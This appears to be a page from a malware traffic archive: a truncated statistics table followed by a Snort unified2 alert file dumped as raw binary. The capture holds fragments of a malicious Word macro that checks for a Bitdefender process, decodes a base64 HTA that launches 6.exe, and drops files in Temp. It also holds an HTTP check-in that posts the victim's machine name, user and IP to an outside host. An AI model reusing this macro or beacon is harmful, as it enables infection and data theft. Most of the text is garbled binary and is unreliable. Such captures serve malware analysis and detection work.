  59       2809511      1        4        2253915      0.40   61       0        100146      36949.43    0.00        36949.43   
  60       2814487      1        1        250621       0.04   58       0        98728       4321.05     0.00        4321.05    
  61       2018005      1        6        7351144      1.31   164      0        96977       44824.05    0.00        44824.05   
  62       2021950      1        2        2885929      0.52   162      0        95898       17814.38    0.00        17814.38   
  63       2824398      1        2        1360838      0.24   59       0        94227       23065.05    0.00        23065.05   
  64       2816940      1        2        3793953      0.68   66       0        93449       57484.14    0.00        57484.14   
  65       2022502      1        4        3657086      0.65   65       0        92487       56262.86    0.00        56262.86   
  66       2816925      1        3        1939836      0.35   66       0        91630       29391.45    0.00        29391.45   
  67       2024769      1        2        180828       0.03   2        0        91518       90414.00    0.00        90414.00   
  68       2814979      1        2        235493       0.04   3        0        91358       78497.67    0.00        78497.67   
  69       2828986      1        2        2035438      0.36   61       0        91242       33367.84    0.00        33367.84   
  70       2816768      1        2        1890316      0.34   59       0        90964       32039.25    0.00        32039.25   
  71       2819993      1        2        2868565      0.51   59       0        90783       48619.75    0.00        48619.75   
  72       2823937      1        13       335178       0.06   61       0        89555       5494.72     0.00        5494.72    
  73       2824273      1        2        5885064      1.05   162      0        89379       36327.56    0.00        36327.56   
  74       2021868      1        2        2704525      0.48   162      0        89232       16694.60    0.00        16694.60   
  75       2807118      1        2        7564479      1.35   162      0        89211       46694.31    0.00        46694.31   
  76       2019094      1        5        2696736      0.48   63       0        88565       42805.33    0.00        42805.33   
  77       2816909      1        2        3986903      0.71   66       0        88199       60407.62    0.00        60407.62   
  78       2804907      1        3        581820       0.10   9        0        87669       64646.67    0.00        64646.67   
  79       2103158      1        6        2035993      0.36   653      0        86165       3117.91     0.00        3117.91    
  80       2829398      1        2        525915       0.09   9        0        84196       58435.00    0.00        58435.00   
  81       2021896      1        2        2701855      0.48   162      0        83893       16678.12    0.00        16678.12   
  82       2023350      1        2        2754741      0.49   162      0        83456       17004.57    0.00        17004.57   
  83       2816327      1        4        2589096      0.46   66       0        83226       39228.73    0.00        39228.73   
  84       2829539      1        1        20602156     3.68   1916     0        82359       10752.69    0.00        10752.69   
  85       2815568      1        2        1906109      0.34   61       0        81572       31247.69    0.00        31247.69   
  86       2816928      1        3        1899211      0.34   66       0        80052       28775.92    0.00        28775.92   
  87       2021921      1        2        2746002      0.49   162      0        79618       16950.63    0.00        16950.63   
  88       2820983      1        5        3006091      0.54   59       0        78886       50950.69    0.00        50950.69   
  89       2807970      1        8        2685448      0.48   61       0        78732       44023.74    0.00        44023.74   
  90       2021894      1        2        2905946      0.52   162      0        78625       17937.94    0.00        17937.94   
  91       2804157      1        4        78120        0.01   1        0        78120       78120.00    0.00        78120.00   
  92       2014956      1        1        493546       0.09   34       0        78075       14516.06    0.00        14516.06   
  93       2815254      1        7        240771       0.04   4        0        77322       60192.75    0.00        60192.75   
  94       2025180      1        1        1421547      0.25   59       0        77072       24094.02    0.00        24094.02   
  95       2024771      1        1        2086997      0.37   322      0        76579       6481.36     0.00        6481.36    
  96       2018358      1        7        112101       0.02   2        0        76090       56050.50    0.00        56050.50   
  97       2820600      1        2        439742       0.08   6        0        75438       73290.33    0.00        73290.33   
  98       2816929      1        4        2805261      0.50   66       0        74587       42503.95    0.00        42503.95   
  99       2816526      1        13       1964869      0.35   66       0        73760       29770.74    0.00        29770.74   
  100      2019837      1        3        93587        0.02   8        1        73711       11698.38    73711.00    2839.43    
  101      2812141      1        2        1754962      0.31   59       0        73309       29745.12    0.00        29745.12   
  102      2809859      1        6        1834583      0.33   63       0        73042       29120.37    0.00        29120.37   
  103      2823450      1        2        2705417      0.48   162      0        72618       16700.10    0.00        16700.10   
  104      2828743      1        3        411977       0.07   7        0        72086       58853.86    0.00        58853.86   
  105      2815886      1        2        1660402      0.30   62       0        70874       26780.68    0.00        26780.68   
  106      2804927      1        2        179353       0.03   3        0        70551       59784.33    0.00        59784.33   
  107      2816931      1        3        2003163      0.36   66       0        70530       30350.95    0.00        30350.95   
  108      2815478      1        5        2158142      0.39   59       0        70026       36578.68    0.00        36578.68   
  109      2013250      1        3        69987        0.01   1        0        69987       69987.00    0.00        69987.00   
  110      2023168      1        2        2795988      0.50   162      0        69264       17259.19    0.00        17259.19   
  111      2804158      1        3        68924        0.01   1        0        68924       68924.00    0.00        68924.00   
  112      2815363      1        3        2111699      0.38   59       0        68850       35791.51    0.00        35791.51   
  113      2021413      1        2        2299435      0.41   61       0        68689       37695.66    0.00        37695.66   
  114      2014411      1        11       126665       0.02   2        2        68262       63332.50    63332.50    0.00       
  115      2816165      1        5        1502233      0.27   66       0        68098       22761.11    0.00        22761.11   
  116      2017261      1        3        2600268      0.46   61       0        68078       42627.34    0.00        42627.34   
  117      2019343      1        3        1965394      0.35   64       0        68016       30709.28    0.00        30709.28   
  118      2014380      1        4        2542071      0.45   122      0        67665       20836.65    0.00        20836.65   
  119      2804626      1        9        1508869      0.27   66       0        67177       22861.65    0.00        22861.65   
  120      2821471      1        2        2624768      0.47   61       0        66358       43028.98    0.00        43028.98   
  121      2821561      1        2        1946745      0.35   63       0        65459       30900.71    0.00        30900.71   
  122      2812433      1        2        2195033      0.39   61       0        65414       35984.15    0.00        35984.15   
  123      2025064      1        5        2719895      0.49   66       0        65004       41210.53    0.00        41210.53   
  124      2816857      1        2        1388654      0.25   64       0        64807       21697.72    0.00        21697.72   
  125      2015986      1        5        1

This file has been truncated. Go here to download in full.


unified2.alert.1548677960 - (63963 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
4[Ž©!F/*â3_Õë•
	fPÀ
N[Ž©![Ž©!F/2E$[û_Õë•
	fPÀ
PÓls‡ðÔÀÿÿÿÿÆŽÿÿ¶ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿxÿÿMEÿÿÿÿÿÿÿÿÿÿßÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(<ÿÿ<<ÿÿ<ÿÿÿÿÿÿ"X
"\
@ÈPÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ.„ÿÿÿÿÿÿÿÿÿÿ@„vÿÿÿÿÿÿÿÿÿÿ@„xÿÿÿÿÿÿÿÿÿÿx@„zÿÿÿÿÿÿÿÿÿÿÿÿÿÿ@„~ÿÿÿÿÿÿÿÿÿÿ@„‚ÿÿÿÿÿÿÿÿÿÿ`„Šÿÿÿÿÿÿÿÿÿÿÿÿ@„Œÿÿÿÿÿÿÿÿÿÿ+Rÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ@xÿÿÿÿ„iƒTÿÿÿÿÿÿÿÿÿÿÿÿÿÿ„P¢O	` „Vÿÿÿÿÿÿÿÿ˜pëO	% „Zÿÿÿÿÿÿÿÿ¸¸WO	%ÿÿÿÿ8ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿßþÊD"€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€€  €@N[Ž©![Ž©!F/2E$[û_Õë•
	fPÀ
Pѓ0H€x€"¸€	ÿÿÿÿ€	ÿÿÿÿЀðÖø€	ÿÿÿÿ&Ёø
€	ÿÿÿÿ(*@px€	ÿÿÿÿ€	ÿÿÿÿ€€	ÿÿÿÿ €	ÿÿÿÿ08@€	ÿÿÿÿ€	ÿÿÿÿ”H€	ÿÿÿÿ€	ÿÿÿÿà€	ÿÿÿÿ€	ÿÿÿÿBè€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€ð€ø€	ÿÿÿÿ€	ÿÿÿÿ
(@P€	ÿÿÿÿ`h€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿp€	ÿÿÿÿ€	ÿÿÿÿÿÿÿÿ€–]òXòp]òˆí¶wi¶nmgmts:$|.x]ò í¶SELECT * FROM Win32_Process x%€.v]ò¸ÿ „þ v“í¶
WScript.Shell 
%ˆ.†8n]òÐF·'ŠI	0GO	 „!¶bdagent.exeœPO	]òè¶IFdJT¶kRPV1N¶¥UQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQN[Ž©![Ž©!F/2E$[û_Õë•
	fPÀ
P‘˜U5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo=$R $Ž'Œ¶Temp$’¶\1.hta¬«Ì¬Ò¶ðPGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i$R $ŽÖnt¬Ò ŒÖn ¬V/purl.¶Temp$’A@: and¶Temp$’¶\1.hta¬· †B@” Refin|ÿÿHkÿÿ@ „!¶PSUAMain.exeœs:do¶4Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA==$R $Ž¶VGVtcA==$R $Ž$’¶\6.e¶x¶e ˜A@–|ÿÿˆkÿÿ€ÿÇx¶4Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA==$R $Ž¶VGVtcA==$R $Ž$’¶XDYucGlm$R $Ž ˜A@–>Thioÿÿؖ]ò€]ò íÆ.Vauthorí¶b64 V%^.Z¶
N[Ž©![Ž©!F/2E$[û_Õë•
	fPÀ
P
ébin.base64 Z(`nt T Z(dthe  Z!b'Rand í°.Zí°.ViÿÿHÿÿÿÿ€ÿÿÿÿF¶Attribute VB_Name = "Module2"
Sub close e()
Dim Hdfgdwd, gDvcvsd
*fdfÄdgSet2¢GetObject("wi" & "nmgmts,:"ª7g8sf?r9\9].ExecQuery("SELECT * FROM Win32_Pr ocessNhdffsdfs
For Each` x In´dwsh`VBA.C reate…PWScript.Shell…(pipec As Boo@lean: ƒ=  TrueŒ If x.¢bdagent.exe" Then
’ ukkkk=StrConv(DecodeBase64("IFdJT‚‘kRPV1NUQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnamF2YXNjcmlwdCIà+DQogÁÅÁ@"zaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTÄ uU2hlbGwiKTsNCiÀ'Á(ÀV3NoÄuUnVuKCI2LmV4ZSIÀEsIGZ`hbHNlÍ
Å#PC9Å9Â*PFNDUklQVCBMQU5HVUFHâRÀ>VkJÅ"ÇHÄ À3pbmRvdy5DbG9zZQAÄPCA8L1ÄD4NCjwvaGVhZÂxib2R5Å[À#8L2J0vZHkÁ!Àh0bWwÁ="),À vbUnis¶ 
Open Environ(€"Temp")¿\1.hta" §OutputÁ–#1€† Prin@t #1, ˆP
G†8†)iA8U0NSSVBUIExBTkdVQÄUdŒWQly‚we2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zÀMjAwMAÔ$Ã;8ÀA0bGU+QXBwbGljYXRpb24gRXhÀCV0ZXI8L3RpdGxlÈVIVEE6Q€VBQTElDÀ[JT04gSUQ9Im9NeUF`wcCIgÅ?âEFQUExJQ0FUSU9OTkÌFNA>øiIgÀ[BCT1JERVbI`5vIEhÂCBM`Bâ
ÂlyIÊWU0hPV0lOVEFTS0JBU€j0ieWVzlTS@QTEVJThlNUÀRDáñW€VNNRU5V`
`5ZXMiêB[9MTD0ibm8ÎiÎJ(D‚‰ C!´ F¡G
ChDi€ž‰‹N
À.Ru¹Q, 0, N[Ž©![Ž©!F/2E$[û_Õë•
	fPÀ
PYªFalsà™Exit SìubA
Xd`›B`Z  ƒËPSUAðMainé!¢¨4YY21kƒ€AvY yAgcG QyBsb2NhbGhvc3QgLW4gMTAwICYpmIA=Œl`i¥kSÁ²©VGVtcÎcp,6. ³`ÑxB¬e"1¡wHid¢¹òNeüxtC½¿A›¿¿¿‡&Ž¡³ XDYu€+mKIé
End0Hv q Fu€nction :jByVal st`rDataKPiˆng)¡Byt´‚P"##QoobjXMLMS€2.D€OMDocum rmZN phIÀ EÜle—
@( 1†tÀ= New ¯£“„¢= #.cBÁ„("b64±~q¡.dÐ
TypÕ"‘b-bz"3EþT0!°|ijɰ¥ön 
ñdÐ1ƒ±á
Nothàª`–°Q1%ñ

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿH*ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ„ÿÿÿÿ8ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿßþÊ"(H
h
x€	ÿÿÿÿˆÿÿÿÿ˜– <Ñ:¬Ñ> 6B@œÿÿ <Ñ:¬Ñ> 6B@œDÿÿÿÿ BÑ:¬Ñ> 6B@žÿÿÿÿ 6B@ ÿÿ 6B@¢xoÿÿpÿÿÿÿhÿÿÿÿ¥°Attribute VB_Name = "Module3"
Sub kfs()(election.MoveDown Unit:=wd4[Ž©!šÑý_Õë•
	fPÀ
N[Ž©![Ž©!š2E$[û_Õë•
	fPÀ
PöÃScree€n, Coun Ð7
 S*`- Right_Ch€aracterb24
cTypeBackspace„Copy
@
End Ö

ð„ÔÀÿÿÿÿ%ÆÊ·ÿÿ¶ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿxÿÿMEÿÿÿÿÿÿÿÿÿÿßÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(<ÿÿ<<ÿÿ<ÿÿÿÿÿÿ"XÓ"\
ÿÿÿÿ8,pÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ„@„Œÿÿÿÿÿÿÿÿÿÿ`„¦ÿÿÿÿÿÿÿÿ	ÿÿ+Rÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ°èÿÿÿÿ„iƒTÿÿÿÿÿÿÿÿÿÿÿÿÿÿ„€?Ð „Vÿÿÿÿÿÿÿÿø% „Zÿÿÿÿÿÿÿÿ(%ÿÿÿÿÈÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿßþÊ%€	ÿÿÿÿ"€	ÿÿÿÿ€(
@€	ÿÿÿÿ€P*X€	ÿÿÿÿ€	ÿÿÿÿ.ˆ2¸N[Ž©![Ž©!š2E$[û_Õë•
	fPÀ
P€ÃðBø€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€€€	ÿÿÿÿ€	ÿÿÿÿ
 8P`€	ÿÿÿÿpx€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€€	ÿÿÿÿ€	ÿÿÿÿÿÿÿÿ–]ò@¶.p¶if'Œ¶Temp$’A@: 6B@ ]òXí¶scripting.filesystemobject$ˆ.¦òx¶5C ŒѪ¶6.e¶xeѬ ¦B@¨v¶5C ŒѪ¶6 ®!°!dѬ ¦B@¨ˆ.oÿÿ–p]òð]òíÆ.Ví¶b64 V%^.Z¶
bin.base64 Z(` T Z(d Z!b'Rí°.Zí°.Viÿÿxÿÿÿÿpÿÿÿÿ²Attribute VB_Name = "Module4"


Sub sdf	()<Dim @kk
kk¤.p" & "ifVChDir Environ(" Temp"dSelection.TypeBack space–   œFSO As0 Obj(qet = Create("scripting.filesyste<mo3fO5.copy Source:="5C£kk, Des?aŒ6.e¼xe^,UserForm1.T@extBox
 
End ›
Priv` FuFn‚€@cod€se64(ByVal strDatŠa€SÅng)ÐByteƒ· ”‚”‘wXMLMS2.DOMDoc€ument
§m…N3IElle‡…+S€[Ä=à New •
‚d= ƒ.c‚h(ð"b64cA"
.d@7A~‹binø.baA?€\		AP»C„2eKÀÅn€6õÁd@Ou€‘(ðNoth‹Š€A@?FÀAAÁk…hÁ

J[Ž©![Ž©!š
.E
 Vÿ_Õë•
	fPÀ
PŒ®ð@ÔLÿÿÿÿG›Æ„ÿÿˆ¶ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿxÿÿMEÿÿÿÿÿÿÿÿÿÿßÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ‚ƒ„…þÿÿÿ‡ˆ‰Š‹ŒŽ‘’“”•–—˜þÿÿÿš›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈþÿÿÿÊËÌÍÎÏÐÑÒÓÔþÿÿÿÖ×ØþÿÿÿÚþÿÿÿþÿÿÿÝþÿÿÿßàáâþÿÿÿäþÿÿÿþÿÿÿçþÿÿÿéêëìþÿÿÿîþÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(S<ÿÿÿÿS<ÿÿÿÿSÿÿÿÿSÿÿÿÿÿÿš0{98364C7C-1C43-4B8C-B38E-16088EE523EE}{A6910E86-9090-42A7-B37F-F6DD97A1F358}ÿÿÿÿh€þÿ0ÿÿ(ÿÿÿÿÿÿÿÿÿÿ%þÿÿÿÿÿÿÿÿÿXÿÿ0ÿÿÿÿÿÿÿÿ%ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿßþÊÿÿÿÿÿÿÿÿxÿÿÿÿâ°Attribute VB_Name = "UserForm1"
"

€Bas€0{98364C7C-1C43-4B8C-B38E-16088EE523EE}{A6910E86-9090-42A7J7F-F6DD97A1F358}
dGlobal!‹SpacoFalseŠCreatablPre declaIdÔTru
BExpose0TemplateDeriv–Customiz‹Dð@ÔLÿÿÿÿG›Ɠ®ÿÿˆ¶ÿÿÿÿÿÿÿÿÿÿÿÿUserForm3ÿÿÿÿÿÿÿÿÿÿÿÿ†ˆThisDocumentÿÿÿÿ™Ï_VBA_PROJECTÿÿÿÿÿÿÿÿÿÿÿÿy PROJECTÿÿÿÿÉìÿÿÿÿÿÿÿÿÿÿÿÿxÿÿMEÿÿÿÿÿÿÿÿÿÿßÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ4[Ž©´)FÚm!
	f6ó³‰ÀPö[Ž©´[Ž©´)FÚEÌÁA
	f6ó³‰ÀPP¡(GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

4[Ž©¶ˆ+Š
	f¹B	¸ÀPÉ[Ž©¶[Ž©¶ˆ­EŸçð
	f¹B	¸ÀPP;³POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: thenlorefuse.com
Content-Length: 126
Cache-Control: no-cache

GUID=5630222068961844480&BUILD=04qbx09&INFO=POPEYESAILOR-PC @ PopeyeSailor-PC\popeye.sailor&IP=12.34.56.78&TYPE=1&WIN=6.1(x64)4[Ž©¶
{+e¸_,Ú
	fPÀN[Ž©¶[Ž©¶
{2E$Â,¸_,Ú
	fPÀPQB,Õ	êa¨ï—ìžóf»*ˆ¨3I«hÒ³,¶Š+Ëâ‹RˆÅQ‹IՅ%ILC!a¬Í%ÕLñ™C•áR-ÛÔšZ8å]a£–ºÑŠ––1U‡CªUÌû–‰ÌŒ)Å;öt`¦	d*[”‚É5mˆÞì}]5\РnQ‘¿ºñ«mǓ¸žœÐë¿k‚ýŽ:©a¨ÝÚ»Pí"#z½L`­!Wِ횻=oÔ×ÇG°ù5xßCÈ¿„×õT*۞ªdXA~f	w)¥u’VE|…|4»]$@¢M߃éÅÅ@UD×Ó¨…ÍJ¨{1e‰ƒ}ÇÁh4mŽ®  ­@ÜB ˆô¡„ýCÑ«W´„Œ>•¸¦jìC%xW©´­`ÕPòˆ‰	[gŸG7¼·´jK2¥¹—±æ!´v««¹ÃT(fû§“+ÍP€ŒAßހ‰„¨oÖÝDGøßUR/_ûETœçb8Ñ#ÛÝ÷b hdâ«îëx¤œg`v×úžšù–²ûWžŒó~SШ	V?«Z?C#Ipë8ä1dår	ä1l˜ÿb8¨]DFøGN§Y<«SS€ðžŒùRµW.—&ᄨT+ƒ}š¤¬ETÞ¼¼`C*G0rXê«DøFàì1xùmF6€÷1cÍ×Õê59†Gˆ0©S
G
ìŒxªT ‚>M*X¿­€ËMÔ:“}‚¡*&]’n„·¨aT
–F€¨iQ(¹ôŠ”(5#~ý«We¸F2ùeF.k˜u±»Í׫—¼+ì1D’DGqˆNþFöV‰ËWáԍ›ê×ì;E)”$—¿Æ2ýЫK„¬€@W•¶ö,j|ån	Î*PQ_VDp‡•—™ÇF	Ä1@”Fp #ƒU:øG<¡
•~©«¬ª }‘OFq`%IIî@-ó=PÿE„²©»_¦D½©ÑîÞPÁŒ–G¼z€ï¸R¿½Ãûô«R¿­Í†•ª%âþT¹û•*ё?­„·“ip!—Ia©/†… ­,«G@„Ç‘ö] „LGŒhi}„sƸ“ÐßQ‘‘›Äº€ãÓìhYl‘µ¥FLYÑ_ÓèhWe¡K†›CUZ"T­$ݨ	D/F¡ÁÑ@Ô¦l„˜í”,üëÀ¾APRãÂؓÍ[“{ñüW+xÆUª–•Qçb×#Ö:lDø@:9ÿ ¸éÛßùCGF¨üjLƒbL¨°W|Xª
kžHN(Žö–)i^©>VjoFþD˜	ˆipEƒ»Ê'0&݄”¨nN«ûËWW̐FÛòM–ŸîªØœ¨CÙZ¢3ì“DQªÏ‚˜E"Èå‚!WVšéDŽ¸†ïiΣ®²‹tC­‹x5—mF6“êתèe’ƒØ†‹¦,Ü-Õ   fH¤ÈžÂ³© …¨:ÚP÷mH¤øGT@ü¹ÔlÑk3Ý#ÖNh##â°>5û.äªUì«LCèP ŽÅi«˜i¥¤”¸=+Y$ˆ ÕՊGÇ$1U‹DŒU”úmāIN[Ž©¶[Ž©¶
{2E$Â,¸_,Ú
	fPÀP‘ÅñªzåøžÞ•©EVáö
¼A+„¯Ù\þÏáD¤qšR×#P\š”6"B«VKiîWFƒ!Û×÷¬I7#ôªV%€[ÁÂ#H¨W×ë“:бh2’ÖJõ¢œTÒ\‰ô³¿¨Ë0€%kU’£â¹HfT’ób¨Ô^‰ã†
¤T’RZyŠ"IY³c¦CtgÁˆHmrüÀ¹^§ÌC<ê­YY½#îH•8·[ÈÉS\¢Ôm¦Öô¦žœ>öd”¡™6K^
ðضKAüjU’SV’õ@œ‰Ã¥”øý]‘¤Zóœ¸LiN¢‹Ô1©e'
ý•íªæ	k–” uNTí«‡â€®žoL†€¨•ö¡OúÕöID멜f˜›‡B¬tV¯©¤¡+V[E‡¤žT
(¥;AK]QuÍKÕ@n‰vµRÂ
@4ˆók˜„-ÜTd!ËAøýskIÀ“¬UUN@©ß"N†¨ܐQÎäÚû–¸¨>	¢UW¯îÀ³EPAø†9õÙD¾VÐ@
Ãç
À%P¬AC‡¤û¸vÁfd‰Ft£&~€¤œ•Q¤ð
A8ôL˜¡¡SU[£QhÝÒB„¡è L6¨u]Ð"L_ ¿3Rš+NÅi°^SÚFŽÜ\a«ÏÕÂ[
#_;‚iüd 6ê•èHU­¤ßD£ÍåTšâBSiþP1š…c§T rF^ióP YÏViûD eÏ÷À)ö«î«Fw¸”$e‡ê‚™Ã%¹u€™Ï¥©wõŠ!eUØGû€WUbªN5q%!]˜«‰Åo·–³"æõ‰Qœ‚"®ì€¨$Ž rË0’!ƒõª´
zoP¨7£¶@¬óHp¨B [¯˜m¦³¶ÝÏ[Y´H~ÛAGÕöW紂£¢Ü¨G
†©LªPÈ:ÝdSO†„!Þü¶G‹ƒeU˯]ل±ÈPª¿…~ÔdM;Š—kÅÎ;ŠÈaxy¿¢ÔZþ¼I;Š˜¥îæºÕéT.íú€WêÝÙj¦	¨Û…ÿ"‡
q!•„ cÏÇK`L"–Ł~ÕUÓ¢´@¨ý\âªôY!ÍôÐKN5BÙVbªM¶ŸÚVaªŽÅh¸9eÁZB¶¢räVšôŐ¯ýPbªô!ZX pÐHö"	°…T˜ûTíF$Jb¨apÍÃò<…‡T
ëÔAC(þW}-«®|Wê[¦]RÓ@Oe£ÆIhdõá)ЭãoNGÝw“©u¯t8sTƔexç,%Ö7æ–Pý»6
Ý ž!º7Ó@´&ô€ø–—ø®û{³Qçê礁|¤ACD—P¨ž	í ô@!P¨˜ö¶ŒšhÚDåŒÙ¼zÖDEõgV@ÚD׀XÁ«Áò©ù(€@¨uU't†:ñ‘ä•qˆèž)&ÄзEÐùÄê¨}Ü๐©$”›;‡¬láõNxqoRmËGT‚¨þy˜QV5@CT!X„€Kjdm@Æ©DVl®Æ:€ÝòÄFüN[Ž©¶[Ž©¶
{2E$Â,¸_,Ú
